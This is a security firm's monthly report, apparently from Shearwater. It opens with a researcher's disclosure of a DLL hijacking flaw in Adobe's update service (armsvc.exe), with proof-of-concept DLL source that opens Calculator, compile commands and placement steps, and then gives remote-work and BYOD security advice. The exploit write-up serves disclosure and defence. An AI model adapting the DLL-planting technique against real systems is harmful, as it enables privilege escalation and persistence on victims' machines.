Our monthly Information Security Report includes a summary of security breaches, threats and vulnerabilities. It is designed to help you gain visibility over the latest events and to help you assess their implication on your environment.

Discovering a ‘Zero-Day’

 

As part of Shearwater’s Managed Security Operations Team, I regularly come across all kinds of exploitable vulnerabilities.

If neglected, these could allow hackers to breach an organisation’s defences, potentially causing irreparable damage.

In most cases, the vulnerabilities I come across are already well-known to security experts. Usually, patches exist to fix them.

However, discovering a new bug for the first time, one that isn’t known by software vendors, security researchers or the general public, is quite rare.

Such a vulnerability is known as a ‘Zero-Day’.

This is the story of how I recently discovered a ‘Zero-Day’ bug in the widely used Adobe Reader.

One day, while performing some vulnerability research, I noticed that the Adobe Update Service runs from a slightly unusual path (Common Files).

Huw’s Zero-Day Vulnerability

While not inherently dangerous, it drew my attention enough to look a little deeper into the service. The AdobeARMService is installed with Adobe Reader, runs as LocalSystem and has the task of keeping Adobe Reader up to date.

I checked the service and binary permissions and did not discover any misconfigurations. Next up, I had to work out how the service functioned. For that purpose, I installed Sysinternal’s Process Monitor, set it up to capture events and ran the armsvc.exe binary.

Huw’s Zero-Day Vulnerability

I noticed the program calls out to a DLL that does not exist, this suggested the possibility of a DLL Injection.

Windows has a defined search order for DLL files when invoked by a program. Interestingly this program was only looking in the local directory and C:\Windows\SysWOW64\, not the entire search path, suggesting it may be a hardcoded reference. If it was a hardcoded refence leftover from development, there is a good chance the program would not be checking that the DLL was signed. If that was the case, by placing a specially crafted DLL in that path, I would be able to execute arbitrary code.

To test my theory, I needed to discover what function the armsvc.exe was trying to load from the DLL. To that end I used the NSA’s reverse engineering tool Ghidra.

Huw’s Zero-Day Vulnerability

Reversing the binary, we can see that it tries to load the UnloadUserProfile function from USERENV.dll. With this knowledge, we can code our own DLL, create a function with that name and whatever code we want to include, export the function and have armsvc.exe load and execute it.

For a proof of concept, we can make the function pop open Calculator.

Proof Of Concept Code:
###############################USERENV.cpp
====================================================================
#include “windows.h”
BOOL APIENTRY DllMain(HMODULE hModule,
       DWORD ul_reason_for_call,
       LPVOID lpReserved
)
{
       switch (ul_reason_for_call)
       {
       case DLL_PROCESS_ATTACH:
              WinExec(“calc”, SW_NORMAL);
       case DLL_THREAD_ATTACH:
       case DLL_THREAD_DETACH:
       case DLL_PROCESS_DETACH:
              break;
       }
       return TRUE;
}
extern “C” __declspec(dllexport) void UnloadUserProfile()
{
       WinExec(“calc”, SW_NORMAL);
}
====================================================================
Compile with
# i686-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL USERENV.cpp
# i686-w64-mingw32-g++ -shared -o USERENV.dll USERENV.o

 

Note that I compiled on Linux with mingw, the code may need to be tweaked for a Visual Studio compilation on Windows.

Copy USERENV.dll to C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\

Run C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe and observe Calculator being run proving arbitrary code execution.

Huw’s Zero-Day Vulnerability

 

A malicious actor could use this vulnerability for Privilege Escalation to SYSTEM, for Persistence and for Signed Execution, Whitelisting Bypass/Defence Evasion.

The root cause of this vulnerability was the non-existent DLL reference and not ensuring loaded DLLs are signed.

Thankfully, Adobe moved swiftly to release security updates to fix this ‘Zero-Day’ bug. Click here for further details and remediation solutions.

It’s a timely reminder to everyone to stay on top of software updates and make sure you regularly update patches to keep your systems secure.

Securing Remote Work

 

Remote working, teleworking, or telecommuting.

Whatever you call it – it is now the new normal.

In short, it is the ability of an organisation’s employees to perform work from locations other than the organisation’s facilities.

Whilst there are many aspects to securing your data and systems as staff work remotely, the three main considerations for every organisation are:

1) Securing Devices
2) Securing Remote Access
3) Securing Staff Practices

Securing Devices

Working from home requires organisational flexibility. Employees will require the use of a variety of devices to do their work, including desktop and laptop computers, smartphones or tablets. These may be supplied by the organisation, allowing easier control over device configurations and settings. Your IT team should maintain control over configurations and settings, ensuring devices are regularly updated and patched.

Increasingly, we see employees using their own personal devices, a practice known as BYOD.

This poses a particular set of challenges to ensure security provisions are adhered to. Your IT team will have limited control over these devices.

If staff must use a personal device, one option is to require the installation of Mobile Device Management (MDM) technology. This helps separate your organisation’s data from their personal information. You will also gain the ability to remotely manage your organisation’s data on the device. However, installing this on many different devices can present many logistical difficulties.

A better option for BYOD management is the use of cloud-based end-point protection tools. These allow you to manage the security and privacy controls on all the devices used by your staff for work, whether the devices are owned by your organisation or by the individual employees. Such systems usually have a single management dashboard where you can install software and run patches on all the devices, saving your IT team a lot of time. It also allows your company security policies to be managed across all devices on the network, including the setting-up of filters and managing settings as required.

The American National Institute of Standards and Technology, or NIST, provides a valuable framework for BYOD security. Covering both computers and mobile devices, it is a great starting point for any organisation concerned with how staff maybe using devices while they work remotely.

 

 8 Essential Tips for BYOD Security: Desktop or Laptop Computers

1 Use a combination of security software, such as antivirus software, personal firewalls, spam and web content filtering, and popup blocking, to stop most attacks, particularly malware;
2 Restrict who can use the PC by having a separate standard user account for each person, assigning a password to each user account, using the standard user accounts for daily use, and protecting user sessions from unauthorised physical access;
3 Ensure that updates are regularly applied to the operating system and primary applications, such as web browsers, email clients, instant messaging clients, and security software;
4 Disable unneeded networking features on the PC and configuring wireless networking securely;
5 Configure primary applications to filter content and stop other activity that is likely to be malicious;
6 Install and use only known and trusted software;
7 Configure remote access software based on the organization’s requirements and recommendations;
8 Maintain the PC’s security on an ongoing basis, such as changing passwords regularly and check the status of security software periodically.

Source: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-114r1.pdf

 

8 Essential Tips for BYOD Security: Mobile Devices

1 Limit access to the device, such as setting a unique personal identification number (PIN) or password not used elsewhere, and automatically locking a device after an idle period;
2 Disable networking capabilities, such as Bluetooth and Near Field Communication (NFC), except when they are needed;
3 Ensure that security updates, if available, are acquired and installed at least weekly, preferably daily;
4 Configure applications to support security (e.g., blocking activity that is likely to be malicious);
5 Download and run apps only from authorized apps stores;
6 Do not jailbreak or root the device;
7 Do not connect the device to an unknown charging station;
8 Use an isolated, protected, and encrypted environment that is supported and managed by the organisation to access the organisation’s data and services.

Source: Source: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-114r1.pdf

 

Following these NIST tips will allows organisations to limit the potential risks associated with the use of BYOD.

Whether your staff use devices supplied by the organisation or their own personal devices, make sure you have Full Disk Encryption implemented. This encrypts the entire hard drive of the device and applies to all files, data, software and operating systems. 

It is also essential that all devices and the systems they run use multi-factor authentication. By implementing multi-factor authentication on all systems, you significantly reduce the risk of attackers being able to breach your systems.

There are many aspects to securing devices as your staff work from home. Many organisations struggle to keep on top of this. However, the risks of failing to properly secure your devices can be very high.

Consider engaging an external Managed Security Services team. These cybersecurity professionals have the expertise to properly deploy, manage and monitor your end-points, including those inside and outside your network perimeter.

A team of experts will also be able to implement secure cloud-based web and email filtering, as well as provide remote SecOps support and advice to your in-house IT teams as they learn to cope with increased demands resulting from remote work practices.

Importantly, Managed Security Services teams can also provide scalable vulnerability management solutions to ensure bugs are routinely identified and patches applied. They can also be on hand in the event of a breach to provide comprehensive incident response solutions.

 

 

Securing Remote Access

It’s essential that remote employees retain the ability to perform their usual work-related tasks.

This will include communicating through a range of channels including email, as well as accessing corporate data and working on corporate files.

To facilitate all these activities, staff will need remote access to a range of systems and applications that are hosted on your organisation’s network. But finding a secure way for them to access your network isn’t always easy. Some of the most common ways include virtual private networks (VPNs), virtual desktops, or access to individual web applications (e.g., webmail).

Whichever you choose, you’re effectively expanding your organisation’s network into people’s homes. This elevates your risk profile to a new level.

You could face the risk of data theft. Your organisation’s corporate, financial, customer and staff data is highly valuable. Any breaches can result in massive losses and can irreparably undermine your organisation’s reputation.

However, data theft isn’t your only risk. If devices are not secured properly, your organisation’s other systems and networks face a range of threats that can cripple essential ICT infrastructure.

If, for example, one of your remote workers uses a device that becomes infected with a worm, this could spread through a virtual desktop to your organisation’s servers.

Meanwhile, VPNs facilitate employees accessing your organisation’s network from home. However, if the VPN isn’t properly secure, it can also provide an opening for attackers. It is essential to verify the identity of VPN tunnel end-points, as using the wrong authentication method could allow an attacker to compromise your corporate network.

Whether your organisation uses VPNs, virtual desktops, or web applications to allow staff to work remotely and access your network and systems, you need experienced Remote Access Penetration Testing more than ever before.

A team of highly experienced penetration testers can evaluate the security of all the components that facilitate remote access and can identify potential weaknesses that could compromise your network from the outside.

Remote Access Penetration Testing is a highly targeted process that interrogates the systems you use for remote access work. Using both unauthenticated and authenticated testing methodologies, we seek to identify any vulnerabilities an attacker may exploit.

With Remote Access Penetration Testing of the systems your staff use to connect into your organisation’s network, you can stay secure and maintain business continuity during this period of working from home.

 

 

Securing Staff Practices

If you don’t yet have a Remote Work Policy in place, you need to develop one.

With your staff working remotely, it’s essential that clear rules are in place to guide how they should work and the steps they need to take to keep the organisation’s data and systems secure.

Some of the cybersecurity-related elements your organisation should include in your Remote Work Policy are:

a) Physical Security

Emphasise the need to bear the physical security of their devices in mind. If staff are working outside their home, they should never leave a device unattended. If they step away from their device, the screen should always be locked. Other members of their household should not use a work device. Policies should make clear that staff will be held accountable for lost or stolen devices.

 

b) Data Security

Make sure staff are transferring corporate data securely. With staff likely to be using less-secure home wi-fi networks, they are more vulnerable to attack. Whilst the network in the corporate environment is likely have strong security provisions, home networks don’t usually have the same protections in place. All the investments your organisation has made in its security, from proxy filtering to network controls, can be redundant in a home environment. Whilst staff can take certain steps to enhance home wi-fi security, such as creating a separate SSID name for work activities, it is preferable that your policies make it clear that staff should use a VPN or a virtual desktop when accessing the network or transferring any corporate data.

An even better solution would be to ensure all the systems your staff need are hosted in the cloud, which they can access using multi-factor authentication.

Furthermore, implementing data loss prevention (DLP) tools, your staff will be blocked from sending sensitive information to an email address outside your company’s domain or to cloud storage services, such as Dropbox or Google Drive.

 

c) Device Security

Ensure your policies clearly state that staff are responsible for ensuring their devices are always updated and patched. This is clearly harder to verify when staff use their own devices. However, emphasising this within the policies will remind staff of their responsibilities for their devices when working remotely.

 

d) Email Security

Remind staff of the importance of phishing awareness. Human error is one of the largest enablers of cyber-attacks. Staff should be reminded of their obligation to carefully check both the sender and the contents of an email before clicking on any links or opening any attachments. Apart from the risks of malware, credential harvesting can be used to launch Business Email Compromise attacks, identity theft, or social engineering attacks.

Incorporating these considerations into your organisation’s Remote Work Policy will help provide guidance to your staff about how they should behave to keep your data, systems and network secure whilst working from home.

Developing effective and implementable Remote Work Policies can be challenging for organisations that have no experience in this area. By engaging cybersecurity specialists with expertise in policy development, you can ensure the policies your organisation adopts are suitable for your circumstances and cover all the essential elements to enhance your security posture.

 

How Shearwater Can Help

Shearwater’s range of cybersecurity solutions can meet every aspect of your organisation’s needs as you transition to remote working practices.

Whether you need Managed Security Services teams to protect your devices and network, assistance with Remote Work Policy development, or Remote Access Penetration Testing to identify vulnerabilities that need fixing – Shearwater has the capacity to assist.

Speak to one of our security consultants today for a no-obligation discussion about your organisation’s needs as you transition to remote work.